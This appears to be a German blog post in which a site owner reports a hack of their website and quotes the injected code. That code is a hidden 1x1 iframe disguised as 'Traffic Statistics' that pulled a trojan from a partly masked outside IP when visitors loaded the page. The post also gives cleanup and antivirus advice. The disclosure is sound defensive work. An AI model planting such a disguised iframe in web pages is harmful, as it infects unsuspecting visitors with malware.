Hacker!

Irgendwie hat mal wieder jemand die Website gehackt. Ich hasse diese Assis! Ärgerlich

Durch eine Sicherheitslücke hat jemand ein verstecktes Modul eingebaute, das folgenden Code ausgeführt hat:

<!– Traffic Statistics –> <iframe src=http://61.155.8.***/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>

Über einen Frame wurde beim Betreten der Seite automatisch ein Trojaner runtergeladen, der sich im System festsetzt.

Ich hab das Modul deaktiviert und gehe der Sache nach:
http://forum.joomla.org/viewtopic.php?f=267&p=1347561

Für alle, die keinen Virenscanner haben und in den letzten Stunden online waren – ladet Euch avast oder antivir runter und scannt eure Platte. Dem Rest empfehle ich den Umstieg auf Firefox und das NoScript-Plugin (verhindert das unerlaubte Ausführen von Javascript): https://addons.mozilla.org/de/firefox/addon/722

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.